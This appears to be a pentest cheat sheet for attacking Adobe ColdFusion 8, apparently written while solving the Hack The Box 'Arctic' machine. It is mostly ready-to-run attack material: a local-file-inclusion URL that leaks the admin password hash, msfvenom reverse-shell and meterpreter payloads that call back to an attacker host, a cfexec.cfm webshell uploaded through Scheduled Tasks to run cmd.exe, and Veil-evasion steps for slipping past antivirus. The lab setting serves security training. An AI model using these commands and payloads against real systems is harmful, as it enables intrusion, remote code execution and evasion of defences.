# Coldfusion

## Basics

* <https://jumpespjump.blogspot.co.uk/2014/03/attacking-adobe-coldfusion.html>
* <https://pentest.tonyng.net/attacking-adobe-coldfusion/>
* REF: Arctic-HTB

## Local File Inclusion - Password Leak!

* Coldfusion 8 CVE
* <https://www.exploit-db.com/exploits/14641/>
* Get the Password hash using LFI

```
http://$IP:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
```

## Reverse Shell

* If you get Admin into Coldfusion
* You can upload a java reverse shell

```
Create:
msfvenom --list payloads | grep java
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$MyIP LPORT=4444 -f raw > shell.jsp

Share:
python -m SimpleHTTPServer
python3 -m http.server

Upload:
Coldfusion > Debugging > Scheduled Tasks
URL : http://$MyIP:8000/shell.jsp
Publish: Save output to file - Yes!
File: \ColdFusion8\wwwroot\CFIDE\shell.jsp
Submit & Run

Execute:
http://$IP:8500/CFIDE/shell.jsp 

Catch:
nc -nvlp 4444
whoami tolis!
```

## Webshell

* If you get Admin into Coldfusion
* You could upload "cfexec.cfm"
* <https://jumpespjump.blogspot.co.uk/2014/03/attacking-adobe-coldfusion.html> --bad link
* <https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/cfm/cfExec.cfm>
* /usr/share/webshells/cfm/cfexec.cfm ..kali

```
vim cfexec.cfm
python -m SimpleHTTPServer

Coldfusion > Debugging > Scheduled Task
http://$MyIP:8000/cfexec.cfm
Publish: Save output to file - Yes!
\ColdFusion8\wwwroot\CFIDE\cfexec.cfm
Submit & Run

Execute:
http://$IP:8500/CFIDE/cfexec.cfm

Command: C:\windows\system32\cmd.exe
Options: /c whoami > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c DIR C:\Users > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c type C:\Users\tolis\Desktop\user.txt > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c systeminfo > C:\ColdFusion8\wwwroot\CFIDE\output.txt

Browse : http://$IP:8500/CFIDE/output.txt
.. arctic\tolis
.. C:\Users\tolis
.. Flag!!
.. Windows Server 2008 R2 64-Bit
```

## Reverse Executable

* You may be able to upload a reverse executable
* Avoid AV detection with [Veil](https://pentest.mxhx.org/03-getting-in/03-veil)

```
----------------------------------
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$MyIP LPORT=4444 -f exe > arctic.exe
python -m SimpleHTTPServer

Coldfusion > Debugging > Scheduled Task
http://10.10.12.166:8000/arctic.exe
\ColdFusion8\wwwroot\CFIDE\arctic.exe

msf > use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 10.10.13.10
set RHOST 4444
RUN

http://$IP:8500/CFIDE/cfexec.cfm
Command: C:\windows\system32\cmd.exe
Options: /c DIR C:\ColdFusion8\wwwroot\CFIDE > C:\ColdFusion8\wwwroot\CFIDE\output.txt
http://10.10.10.11:8500/CFIDE/output.txt
.. Found: 'arctic.exe'
.. BLOCKED by Antivirus

----------------------------------
Bypass Antivirus with veil-evasion

>  veil-evasion
>> list
>> choose '24'.. Powershell/meterpreter/rev_tcp
>> LHOST=$MyIP
>> LPORT=4444
>> generate
.. 'arctic'.. which makes 'arctic.bat'
cp arctic.bat .

Coldfusion > Debugging > Scheduled Task
http://10.10.12.166:8000/arctic.bat
C:\ColdFusion8\wwwroot\CFIDE\arctic.bat

http://$IP:8500/CFIDE/cfexec.cfm
Command: C:\windows\system32\cmd.exe
Options: /c DIR C:\ColdFusion8\wwwroot\CFIDE\arctic.bat
May need to try this 2-3 Times.. but will work!!

MSF - Connected!
```

## Other:

* Also consider:
* <https://arrexel.com/coldfusion-8-0-1-arbitrary-file-upload/>